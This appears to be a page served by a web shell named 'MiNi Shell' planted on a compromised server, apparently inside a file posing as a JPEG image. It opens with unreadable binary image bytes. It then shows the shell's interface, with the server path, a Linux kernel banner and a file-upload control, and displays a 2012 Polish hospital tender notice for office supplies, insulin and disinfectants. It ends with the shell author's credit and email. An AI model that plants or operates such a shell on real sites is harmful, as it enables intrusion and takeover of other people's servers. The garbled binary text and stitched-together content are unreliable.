JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120510/149344-N-2012.html

<p class="kh_header"><b>Radzymin: II przetarg na zakup i dostawę artykułów biurowych, leków i środków czystości 2012r</b><br>
<b>Numer ogłoszenia: 149344 - 2012; data zamieszczenia: 10.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 022 7865037, faks 022 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.radzymin.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> II przetarg na zakup i dostawę artykułów biurowych, leków i środków czystości 2012r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie zadania nr 1 dotyczy opis zadania    Zadanie Nr 1    artykuły biurowe 
Papier POL lux A4 80g/2mm	8 00 ryz
Papier POL lux A3 80g/2mm	15 ryz
Segregator A4 foliowany  czerwony  75 mm  z szyna met.	70 szt.
segregator A4 foliowany czarny  75 mm z szyna met.	70 szt.
Segregator foliowany niebieski z szyną metalową	70 szt.
Segregator A4 foliowany  żółty  75 mm  z szyna met.	70 szt.
segregator foliowany niebieski  50 mm z szyna met.	560 szt.
Teczka kartonowa  A4  z gumką 	100 szt.
Długopis BIC Orange czerwony 	60 szt.
Długopis BIC Orange czarny	100 szt.
Długopis BIC Orange niebieski	100 szt.
Długopis Orange zielony 	20 szt.
Długopis Atlantis niebieski	50 szt.
Długopis żelowy	50 szt.
Marker na bazie wody grubość linii 3 mm czarny	70 szt.
Markier lakierowy grubość linii 2 mm czarny	70 szt.
Marker do tablic sucho     scieralne  zestaw 4 kolory	5 szt.
Spinacze biurowe 50 mm	50 op.
Spinacze biurowe 33 mm 130 op.
Koszulka krystaliczna A4 100 szt. op. 	160 op.
Koszulka krystaliczna szeroka A4   25 szt. op.	20 op.
Pineska beczułka	5 op.
Pineska zwykła metalowa 10 op.
Ołówek z gumką 2988 / HB 	48 szt.
Brulion w kratkę 96 k.  A4 twarda okładka 	60 szt.
Brulion w kratkę 96  A5 twarda okładka 	60 szt.
Flamaster czarny 20 szt.
Korektor w długopisie 12 ml.  Tipp-Ex	15  szt.
Korektor w płynie 20 ml. Tipp-Ex	40 szt.
Zszywki 24/6 	10 000 szt.
Zszywki  23/8 	10 op. x 1000
Tusz do stempli uniwersalny  czarny 	30 szt.
Zszywacz FC 5505 Leitz na zszywki 24/6  	10 szt.
pamięć przenośna 4 GB	5 szt.
Płyty CD-R  SONY  CAKE 48X  ( op. 50 szt)	10 op.
Skoroszyt wpinany A4 okładka przednia przezro. tylna kolorowa	100 szt.
Teczka kartonowa kolorowa A4  z gumką 	300 szt
Skoroszyt kartono. A4 biały 	600 szt
Grzbiety do bindowania  plastk.  8 mm	1 op
Okładki  A4 przezroczyste do dokumentów służące jako pierwsza strona 	1 op
Okładki skóropodobne A4  służące jako ostatnia strona  	1 op.
Nożyczki  uniwersalne  15,5 cm 	5 szt
Woreczki strunowe 175 x 250 mm 	15 op.
Klej w sztyfcie  20G	35 szt
Taśma TESA Transparent - Film  19 mm 	70 szt
Blok A5 bez okładki  w kratkę 	10 szt.
Notes  samoprzylepny  
51x 38 mm     3 szt w op.	30 op.
Notes samoprzylepny do podajnika  Post-it  76x76	20 szt
Podajnik Millenium model  C2014	2 szt.
Baterie alkaiczne ENERGIZER AAA kod BAK  001   1,5 V 	20 op.
Baterie alkaiczne ENERGIZER 4 szt. w op.  1,5 V  	20 op.
Półki na dokumenty przezroczyste	10 szt
Zakreślasz  fluorescencyjny STABLO BOSS  (4 kolor)	25  op.
Flamastry etui (4 kolory)	20 op.
Przekładki kartonowe 	100 szt.
Linijka 30 cm 	10 szt.
Zeszyt A5    32 kart	50 szt.
Zeszyt A5   60 kart	50 szt.
Płyn do czyszczenia tablic suchościeralno- magnetycznych	2  szt.
Klipsy do papieru Grand  19 mm 	20 op
Klipsy do papieru Grand  25 mm	20 op
Przybornik na biurko Dual walec z szufladkami symbol 1995	5 szt
Folia zgrzewarek A4	50 ark. 
Mechanizm skoroszytowy 4  op.
Grzbiety wsuwane A4 leitz  (niebieskie)  GBK 127	1 op.
Grzbiety do bindownicy  GBK019 (niebieskie) 	1 op
Temperówka z pojemnikiem 	5 szt
Cienkopis Stabilo Point 88 
Czerwony 40	5  szt.
Cienkopis Stabilo Point 88 
Zielony 36	5 szt.
Cienkopis Stabilo Point 88 
Ciemno niebieski 41	10 szt.
Cienkopis Stabilo Point 88 
Czarny 46	25 szt.
Papier POL lux A4 80g/2mm  mikx kolorów	10 ryz
Dysk DVD +R/R  16x  kod XCK 029   50 szt	1 op.
Gumka Rasoplast	20 szt
kredki ołówkowe   24 kolory    5 op.
Kredki świecowe   5 op.
Toner - folia do faksu Panasonic KX-FA57E	5 szt
Blok do flichartów  	2 szt.
Marker permanentny	36 szt.
Marker permanentny wodoodporny	24 szt.
Zeszyt A5/16 kratka 20 szt.
Zeszyt A5/32 kratka 20 szt.
Zeszyt A5/16 kratka 20 szt.
Pamięć przenośna 	 5 szt.
Ołówek wodoodporny	12 szt.
Kostka wkład papieru kolorowy	10 szt.
Zakładki indeksujące Donau 	8 szt
Bloczki samoprzylepne POST IT Tęczowe	8 szt
Karton wizytówkowy	2 op
Papiery kolorowe Rainbow Mix	2op
Długopis FN-07 niebieski	10 op
Długopis FN-07 czarny	4 op
Zszywacz D.Rect 315	10 szt
Zawieszki do kluczy Key Clip	3 op
Teczka tekturowa wiązana 	5 op
Folia laminacyjna samoprzylepna	5 op
Nawilżacz glicerynowy do palców	5 szt
.

Przedmiot zamówienia w zakresie zadania nr 2 dotyczy Zadanie  Nr 3 - leki przeciwcukrzycowe 
Huma Ject  R  penfil	 3 ml-100j ml	5         2 op. 
Huma ject M3  30/70  penfil	3 10 ml 100jml	10  2op.
Huma Ject N	 3 ml-100j ml	5          2 op.
Mixtard 20  Novolet penfil	 3 ml-100j ml	10            2 op.
Mixtard  30  Novolet penfil	 3 ml-100j ml	10              2 op.
Mixtard  40 Novolet  penfil	 3 ml-100j ml	10         2 op.
Insulatard  Novolet penfil	 3 ml-100j ml 	10                 2 op.
Gensulin  M 50  50/50	 3 ml-100j ml	10               2 op.
Gensulin R	 3 ml-100j ml	10                2 op.
Gensulin  M20   20/80	 3 ml-100j ml	10              2 op.
Gensulin  M40  40/60	 3 ml-100j ml	10            2 op.
Gensulin  M30  30/70	 3 ml-100j ml	10                 2 op.
Gensulin  M 30  30/70	 3 ml-100j ml	10                2 op.
Actrapid  HM  penfil	 3 ml-100j ml	10                 2 op.
Insulatard  HM  penfil	 3 ml-100j ml	10                  2 op.
Mixtrad  40  HM  penfil	 3 ml-100j ml	10                2 op.
Mixtrad  50  HM  penfil	 3 ml-100j ml	10                 2 op.
Humulin  N	 3 ml-100j ml	10                 2 op.
Humulin  R	 3 ml-100j ml	10                2 op.
Humulin  R	1,5 ml100jml	10                 2 op.
Humulin  M3  30/70	 3 ml-100j ml	10               2 op.
Mixtard  30  HM  penfil	 3 ml-100j ml	10              2 op.
Amaryl	 1 mg	600           20 op.
Amaryl	  2 mg	420           14 op
Amaryl	  3 mg	300             10 op.
Amaryl	 4 mg	 450       15 op. 
.

Przedmiot zamówienia w zakresie zadania nr 3 dotyczy opis zadania   Zadanie nr. 7 - Preparat do mycia pacjenta, skolonizowanego MRSA
Preparat do mycia pacjentów skolonizowanych MRSA, ba bazie chlorheksydyny, bez triclosanu i octenidyny. 500 ml	20 szt
.

Przedmiot zamówienia w zakresie zadania nr 4 dotyczy opis zadania    Zadanie Nr 10 - środki do mycia i dezynfekcji powierzchni  
Preparat chlorowy w tabletkach do 3 g do dezynfekcji powierzchni.	300 tabletek 20 op
Preparat do jednoczesnego mycia i dezynfekcji dużych powierzchni zmywalnych nie zawierający aldehydów, chloru, fenoli, bez dodatków alkoholi. Dostosowany do stałego systemu dozowania - 2% . 	6 litrów	20 op
Alkoholowy preparat do szybkiej dezynfekcji małych powierzchni i miejsc trudno dostępnych. Preparat gotowy do użycia w spray-u 
bez zawartości aldehydu glutarowego i QAV. 	1 litrowe 
5 litrowe	50 szt.
20 szt. Chusteczki  do szybkiej dezynfekcji  na bazie alkoholu do odkażania małych powierzchni i sprzętu medycznego. Skład substancji nasycającej: 2 - propanolu i 1-propanol bez zawartości czwartorzędowych związków amonowych, aldehydów ani kwasów. Chusteczki o przyjemnym zapachu. Spektrum działania: B,F, Tbc,v (HBV,HIV,Vaccinia, Adeno, Papowa, Rota) w czasie max.10 min. 	Wkłady 
pojemniki	300 szt     80 szt
Chusteczki bez alkoholu do szybkiej dezynfekcji powierzchni i głowic USG, bez zawartości alkoholu i aldehydów	Wkłady  Pojemnik	100 szt   20 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 33.61.50.00-4, 39.33.00.00-4, 39.33.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzzoz-radzymin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Radzyminie
Konstytucji 3 Maja 17
05-250 Radzymin
Pokój nr  214 II piętro budynek przychodni..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2012 godzina 10:30, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Radzyminie
Konstytucji 3 Maja 17
05-250 Radzymin
Pokój nr  214 II piętro budynek Przychodni..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 16.06.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1  - artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> leki przeciwcukrzycowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.61.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Preparat do mycia pacjenta, skolonizowanego MRSA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.33.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> środki do mycia i dezynfekcji powierzchni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.33.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com